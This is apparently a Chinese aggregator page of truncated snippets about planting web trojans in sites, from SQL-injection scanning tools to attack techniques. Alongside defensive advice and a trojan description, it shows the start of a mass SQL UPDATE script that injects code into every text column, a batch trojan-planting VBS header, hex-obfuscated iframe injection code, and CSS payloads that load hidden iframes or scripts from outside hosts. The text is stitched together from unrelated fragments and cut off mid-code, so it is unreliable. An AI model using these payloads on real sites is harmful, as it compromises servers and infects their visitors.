那么，除了在Web开发的时候注意以外，有什么有效的工具可以对抗SQL注入攻击？今天，微软和惠普的安全部门合作发布了三个工具，分别是：微软SQL注入攻击源码扫描器：Microsoft Source Code Analyzer for SQL Injection (MSCASI)。这个工具给网站开发人员使用。是一个静态扫描ASP代码的工具，可以查找发现第一类和第二类的SQL注入攻击漏洞。工具下载地址：http://support.microsoft.com/kb/954476惠普的 Scrawlr工具。这个工具可以被网...

scan.vbecscript scan.vbe web目录程序代码：'版权信息br="************************************" & vbCrLfbr=br & "* VBS 批量挂马脚本 *" & vbCrLfbr=br & "* BY BanLG *" & vbCrLfbr=br & "*************...

SQL语句如下：用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字段）xtype=99 ntextxtype=35 textxtype=231 nvarcharxtype=167 varchar———————YD的分割——————————–DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor CURSOR FORSelecta.name,b.namefrom sysobjects&nbs...

还有在国外的一些机器上，什么权限都拿到了也不知道他怎么弄的，什么都不让写，好不容易写个文件没一会又改回去了，真的让人很!#$%%#%^#%^，据说就有一种软件能监视重要的文件，一旦发现更改就会给恢复过去，譬如他监视web目录的话我们就不能更改他网站的任何内容了。不过，看了很多大虾的文章，自己也略微研究了下，也总算琢磨点东西出来，不用写任何文件就可以实现将别人的页面涂改和大家经常传说的挂马等等后果，这里就给大家介绍下，那些只知道勤快的管理员也要小心了！大家知道，我们浏览网站的时候都是服务器将信息处理成Html方式再返回给我们，而我们要实现的是当客户访问的时候能改变他们浏览器的内容，使他隐蔽的执行...

很多站长因为使用网上不常见的程序，有漏洞得不到补丁；而自己又没有编程能力无法修复或者干脆不知道漏洞在那里，被挂马后恢复程序结果不久又被挂……还有很多人即使使用的是应用比较广泛的程序，但也可能因为没及时打上补丁或出了漏洞官方还未发现而被挂马。　　老是被挂也不是个事。怎么才能彻底杜绝被挂马呢？让程序完美，没有任何漏洞？这个可能性好象接近于0。我们只能从其他的地方想办法。　　首先来看一下马是怎么挂上去的。首先，“黑客”会找到一个漏洞，然后利用这个漏洞上传一个后门程序上去以取得WEBSHELL，这个上传的程序一般为ASP文件（本文以ASP为例，其他基本相同），或者他会创建一个名字看起来像ASP文件的目...

如今网民上网可算是提心吊胆，面对病毒，也许杀毒软件还能防止一二，但如果遇到网页中挂马行为，甚至直接将用户当前机所安装的杀毒软件直接强行关闭，那么其后果是不言而喻的。如今的网页有马行为也不像以前那么单一，甚至不出现下载提示，直接从后台开始下载运行其马，然后秘密的收集用户信息并返溃到恶意者手中。    网马危害    如果一台正常的网络服务器被恶意用户入侵，其网页被挂马，在一定程度上可以说是网页被篡改，其危害是巨大的，随着用户访问流量的增多，会造成此马的传播性越发增大，由于其隐蔽性比较强，导至很多杀毒软件没有及时更新的...

挂得比较隐蔽，http://btn.pchome.net/flash.js的中间被加入了如下代码：window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\...

body { background-image: url(’javascript:document.write(”<script src=http://www.jb51.net/9xiao.js></script>”)’)}9xiao.js内容是 document.write(”<iframe src=你的网马 width=0 height=0></iframe>”)...

（包含服务器端注入、客户端ARP注入等）IEOnly——一般只有IE害怕iframe这样的挂马,所以灵儿就拿IE开刀。在阅读本文之前，我们先了解一下expression；  IE5及其以后版本支持在CSS中使用expression，用来把CSS属性和JavaScript脚本关联起来，这里的CSS属性可以是元素固有的属性，也可以是自定义属性。就是说CSS属性后面可以是一段JavaScript表达式，CSS属性的值等于Javascript表达式执行的结果。在表达式中可以直接引用元素自身的属性和方法，也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。&n...

网上流行的:body{ background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')}//此方法会使主页不正常.返回一片空白.用弹窗.body{ background-image: url('javascript:open("http://192.168.0.5/test.htm")')}//弹出一个框.难看 易被...

[%repeat_0 match="/data/option"%] [%=@title%] [%=@count%]票 [[%=@percent%]％] [%_repeat_0%]   SXS.EXE这是一个盗取QQ帐号密码的木马病毒，特点是可以通过可移动磁盘传播。该病毒的主要危害是盗取QQ帐户和密码；该病毒还会结束大量反病毒软件，降低系统的安全等级。 中毒症状：电脑分区双击不能自动打开或者很难打开，用右键打开可以！这是最显见的症状！ 解决方式：网上已经有很多手动删除的方式！ 现在有个最...